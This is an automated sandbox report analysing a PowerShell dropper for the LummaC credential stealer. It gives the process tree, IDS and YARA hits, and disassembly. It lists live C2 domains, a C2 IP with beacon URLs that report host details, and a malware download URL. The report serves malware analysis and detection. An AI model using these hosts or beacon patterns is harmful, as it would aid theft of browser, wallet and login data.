Edit tour

Windows Analysis Report
wEY98gM1Jj.ps1

Overview

General Information

Sample name:	wEY98gM1Jj.ps1 renamed because original name is a hash value
Original sample name:	0ae302e634ecbe867d0e637f64c43ecc50a535893d495551da4fdf32843e8c2b.ps1
Analysis ID:	1617747
MD5:	0329341197692a61c670433524de1acc
SHA1:	492fd50adc54682bca41fd2a4d7a59bb0f430d7a
SHA256:	0ae302e634ecbe867d0e637f64c43ecc50a535893d495551da4fdf32843e8c2b
Tags:	91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 1948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2348 cmdline: "C:\Windows\Temp\cmd.exe" MD5: 39C2F63970A0B2B1942E7072A6C648DC)

cmd.tmp (PID: 2992 cmdline: "C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmp" /SL5="$8007C,13626613,119296,C:\Windows\Temp\cmd.exe" MD5: B1F9D665E52C29972B50D7145D88DCE1)

cmd.exe (PID: 5608 cmdline: "C:\Windows\Temp\cmd.exe" /VERYSILENT MD5: 39C2F63970A0B2B1942E7072A6C648DC)

cmd.tmp (PID: 6040 cmdline: "C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmp" /SL5="$6042A,13626613,119296,C:\Windows\Temp\cmd.exe" /VERYSILENT MD5: B1F9D665E52C29972B50D7145D88DCE1)

OperaAirSetup.exe (PID: 5712 cmdline: "C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe" MD5: 4A2B73CAEF012ECF99EF3546AADDEDBF)

MSBuild.exe (PID: 1460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

notepad.exe (PID: 4508 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\wEY98gM1Jj.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["DfreamWave.cyou", "shiningrstars.help", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2871226896.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000003.2849424911.00000000049C2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000C.00000002.2855864758.00000000029B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1296ca:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x12cc60:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.2951364094.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: OperaAirSetup.exe PID: 5712	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.3.OperaAirSetup.exe.4a11aa7.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.3.OperaAirSetup.exe.4a11aa7.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.OperaAirSetup.exe.5ca0000.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.OperaAirSetup.exe.5ca0000.11.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.3.OperaAirSetup.exe.49d1a87.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.OperaAirSetup.exe.29b243e.1.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x12548c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
12.2.OperaAirSetup.exe.29b243e.1.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x12728c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x12a822:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
13.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
13.2.MSBuild.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 172.67.172.121, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 1460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49989

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6032, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", ProcessId: 1948, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6032, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\wEY98gM1Jj.ps1", ProcessId: 1948, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:28:50.143331+0100	2028371	3	Unknown Traffic	192.168.2.6	49989	172.67.172.121	443	TCP
2025-02-18T08:28:50.818254+0100	2028371	3	Unknown Traffic	192.168.2.6	49990	172.67.172.121	443	TCP
2025-02-18T08:28:52.030140+0100	2028371	3	Unknown Traffic	192.168.2.6	49991	172.67.172.121	443	TCP
2025-02-18T08:28:53.077620+0100	2028371	3	Unknown Traffic	192.168.2.6	49992	172.67.172.121	443	TCP
2025-02-18T08:28:54.189494+0100	2028371	3	Unknown Traffic	192.168.2.6	49993	172.67.172.121	443	TCP
2025-02-18T08:28:55.418204+0100	2028371	3	Unknown Traffic	192.168.2.6	49995	172.67.172.121	443	TCP
2025-02-18T08:28:56.663955+0100	2028371	3	Unknown Traffic	192.168.2.6	49996	172.67.172.121	443	TCP
2025-02-18T08:28:58.770414+0100	2028371	3	Unknown Traffic	192.168.2.6	49997	172.67.172.121	443	TCP

ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:27:40.703507+0100	2021697	1	A Network Trojan was detected	192.168.2.6	49712	34.120.190.48	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:28:50.319007+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49989	172.67.172.121	443	TCP
2025-02-18T08:28:51.304298+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49990	172.67.172.121	443	TCP
2025-02-18T08:28:59.225325+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49997	172.67.172.121	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:28:50.319007+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49989	172.67.172.121	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:28:55.907049+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49995	172.67.172.121	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:28:00.253536+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49813	91.206.178.120	5001	TCP

ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:27:39.768052+0100	2860232	1	Malware Command and Control Activity Detected	192.168.2.6	49710	91.206.178.120	5001	TCP

ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:27:39.780146+0100	2860233	1	Malware Command and Control Activity Detected	91.206.178.120	5001	192.168.2.6	49710	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:28:56.669366+0100	2843864	1	A Network Trojan was detected	192.168.2.6	49996	172.67.172.121	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:27:40.792665+0100	1810003	2	Potentially Bad Traffic	34.120.190.48	443	192.168.2.6	49712	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:27:37.567553+0100	1810000	2	Potentially Bad Traffic	192.168.2.6	49709	104.26.12.205	80	TCP
2025-02-18T08:27:39.768052+0100	1810000	2	Potentially Bad Traffic	192.168.2.6	49710	91.206.178.120	5001	TCP
2025-02-18T08:27:40.703507+0100	1810000	2	Potentially Bad Traffic	192.168.2.6	49712	34.120.190.48	443	TCP
2025-02-18T08:28:00.253536+0100	1810000	2	Potentially Bad Traffic	192.168.2.6	49813	91.206.178.120	5001	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://www.littlemoroccanthings.com/wp-content/plugins/header-footer-code-manager/images/TestLAB.ex	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=83035$M	Avira URL Cloud: Label: malware
Source: https://dfreamwave.cyou/api	Avira URL Cloud: Label: malware
Source: https://www.littlemoroccanthings.com/wp-content/plugins/header-footer-code-manager/images/TestLAB.exe	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=$randomNumber	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=83035	Avira URL Cloud: Label: malware
Source: DfreamWave.cyou	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=	Avira URL Cloud: Label: malware
Source: https://DfreamWave.cyou/pi	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra	Avira URL Cloud: Label: malware
Source: https://DfreamWave.cyou:443/apiRun	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=83035	Avira URL Cloud: Label: malware
Source: https://DfreamWave.cyou/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["DfreamWave.cyou", "shiningrstars.help", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe (copy)	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-IS7LO.tmp	ReversingLabs: Detection: 13%
Source: C:\Windows\Temp\cmd.exe	ReversingLabs: Detection: 54%

Multi AV Scanner detection for submitted file

Source: wEY98gM1Jj.ps1

Virustotal: Detection: 14%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.8% probability

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DfreamWave.cyou
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: shiningrstars.help
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: mercharena.biz
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: generalmills.pro
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: stormlegue.com
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: blast-hubs.com
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: blastikcn.com
Source: 0000000C.00000002.2868710892.00000000043C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: nestlecompany.pro

Source: unknown	HTTPS traffic detected: 34.120.190.48:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.121:443 -> 192.168.2.6:49997 version: TLS 1.2

Source:	Binary string: DIFXAPI.pdb source: is-JNHPI.tmp.10.dr
Source:	Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdbSHA256 source: is-40U72.tmp.10.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdb source: is-40U72.tmp.10.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub\VBoxProxyStub.pdb source: is-SBTFQ.tmp.10.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: cmd.tmp, 00000008.00000003.2359613822.0000000002189000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr, cmd.exe.0.dr

Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00EB0582 FindFirstFileExW,		12_2_00EB0582
Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe	Code function: 12_2_00E88D04 FindFirstFileW,		12_2_00E88D04

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CB8D7CB0h	13_2_004469D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx]	13_2_00444360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	13_2_004484E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_004466FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_0041AF79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3170364Ch]	13_2_0042D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], C8B478E8h	13_2_0042D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-55F3AF81h]	13_2_0040F7AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then inc ebx	13_2_00401040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_0043584E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, bx	13_2_0042C80D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_0043581C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], al	13_2_00435027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_0043581C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_0041D952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx]	13_2_00421904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_00421904
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 2C331E1Fh	13_2_0043110C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push esi	13_2_0041311D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh	13_2_004489E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_00430998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, ebx	13_2_004079B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+576D857Eh]	13_2_0042B270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	13_2_0041DA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	13_2_00444A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+3Ch]	13_2_00444A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 2C1F0655h	13_2_00444A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, edx	13_2_00444A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+eax*8], 025264CEh	13_2_00444A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_00446B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433B3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_00433B3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, eax	13_2_0042DBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0001C279h]	13_2_004113D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov esi, dword ptr [ebp-18h]	13_2_00445BD9
